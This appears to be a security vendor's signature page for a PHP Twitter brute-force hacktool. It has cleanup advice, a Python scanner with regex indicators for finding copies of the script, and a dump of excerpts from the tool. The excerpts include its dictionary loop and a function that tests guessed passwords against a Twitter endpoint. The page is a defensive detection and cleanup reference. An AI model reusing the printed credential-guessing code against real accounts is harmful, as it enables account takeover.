Malware Signatures

php.hacktool.twitterbruteforce.001

As its name suggests, the Twitter Brute Force script helps automate hacking Twitter accounts. It provides a simple interface where you can choose a Twitter account to hack and the mode of the attack: dictionary or brute force.
In a dictionary attack, the script tries the various passwords listed in a file, usually named passwords.txt. The brute force mode is poorly implemented in current versions of the script and can hardly hack anything.

Affecting

Any server with PHP enabled

Cleanup

Delete the malicious script and passwords.txt file. Scan your server for other types of malware and specifically for backdoors.
You can also sign up with us and let our team remove the malware for you.
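
To locate copies of the script during cleanup, the following added example (not part of the original signature page and not the vendor's scanner) walks a web root and scores PHP files against strings visible in the Dump excerpts, also reporting a passwords.txt found beside a hit. The indicator names, weights, threshold and the functions `score_file` and `scan` are assumptions of this example.

```python
import os
import re
import sys

# Indicators from this page's Dump excerpts; weights and THRESHOLD are assumptions.
INDICATORS = {
    "banner": (re.compile(rb"Twitter Brute Force By", re.I), 3),
    "wordlist_var": (re.compile(rb"\$dic\s*=\s*[\"']passwords\.txt[\"']"), 2),
    "creds_in_url": (re.compile(rb"https://'\s*\.\s*\$username\s*\.\s*':'\s*\.\s*\$password"), 3),
    "check_fn": (re.compile(rb"function\s+check_correct\s*\("), 1),
    "endpoint": (re.compile(rb"stream\.twitter\.com/1/statuses/filter\.json"), 1),
}
THRESHOLD = 3

# Constructed sample: indicator lines only, not a working script.
SAMPLE = b"""<?php
////Twitter Brute Force By Mauritania Attacker//////
$dic ="passwords.txt";
function check_correct($username, $password)
"""

def score_file(path, max_bytes=1_000_000):
    """Return (score, matched indicator names) for the first max_bytes of a file."""
    with open(path, "rb") as fh:
        data = fh.read(max_bytes)
    hits = [name for name, (rx, _w) in INDICATORS.items() if rx.search(data)]
    return sum(INDICATORS[name][1] for name in hits), hits

def scan(root):
    """Walk root; report PHP files at or above THRESHOLD and any wordlist beside them."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith((".php", ".phtml", ".inc")):
                continue
            path = os.path.join(dirpath, name)
            try:
                score, hits = score_file(path)
            except OSError:
                continue  # unreadable file: skip, do not abort the scan
            if score >= THRESHOLD:
                wordlist = os.path.join(dirpath, "passwords.txt")
                findings.append({"path": path, "score": score, "hits": hits,
                                 "wordlist": wordlist if os.path.isfile(wordlist) else None})
    return findings

if __name__ == "__main__":
    for f in scan(sys.argv[1] if len(sys.argv) > 1 else "."):
        print(f["score"], f["path"], ",".join(f["hits"]), f["wordlist"] or "-")
```

A file that only references the Twitter streaming endpoint scores 1 and is not reported, so legitimate API clients are not flagged on that string alone. Renamed or obfuscated variants will not match these literal strings, which is why the full malware and backdoor scan above is still needed.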

Dump

... excerpts ....

/////////////////////////////////////////////////////
////Twitter Brute Force By Mauritania Attacker//////
///////////////////////////////////////////////////

///////////////////////////////////////////////////
////Changing Description won't make you the Coder/
/////////////////////////////////////////////////

////////////////////////////////////////////////////////////////////////////
# This script was created to Brute Force Twitter Logins,#
#it Uses CURL and 2 Methods of Login attacks (Brute Force and Dictionary) #
///////////////////////////////////////////////////////////////////////////

$dic ="passwords.txt";
//////////////////////////////////////////////////////////////////////////

...

// Sets variables and retrives twitter error for comparing
if(isset($_POST['attack']) && isset($_POST['username'])) {
$username = $_POST['username'];
$headers = array(
"Host: stream.twitter.com",
"User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:23.0) Gecko/20100101 Firefox/23.0",
"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
"Accept-Language: fr,fr-fr;q=0.8,en-us;q=0.5,en;q=0.3",
"Accept-Encoding: text", # No gzip, it only clutters your code!
"Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7",
"Date: ".date(DATE_RFC822)
);
$c = curl_init('https://stream.twitter.com/1/statuses/filter.json');

...

if($_POST['attack'] == "dictionary") {
$Dictionary = file("$dic");
for ($Position = 0; $Position < count($Dictionary); $Position++) {
$Dictionary[$Position] = str_replace("rn", "", $Dictionary[$Position]);
if(check_correct($username, $Dictionary[$Position])) {

...

// Function for checking whether the username and password are correct
function check_correct($username, $password)
{
global $wrong, $headers;
$c = curl_init('https://'.$username.':'.$password.'@stream.twitter.com/1/statuses/filter.json');
curl_setopt($c, CURLOPT_HTTPAUTH, CURLAUTH_ANY); // use authentication
curl_setopt($c, CURLOPT_HTTPHEADER, $headers); // send the headers
curl_setopt($c, CURLOPT_RETURNTRANSFER, 1); // We need to fetch something from a string, so no direct output!
curl_setopt($c, CURLOPT_FOLLOWLOCATION, 1); // we get redirected, so follow
curl_setopt($c, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($c, CURLOPT_SSL_VERIFYHOST, 1);
curl_setopt($c, CURLOPT_UNRESTRICTED_AUTH, 1); // always stay authorised
$str = curl_exec($c); // Get it
curl_close($c);
if($str != $wrong) {return true;}
else {return false;}
}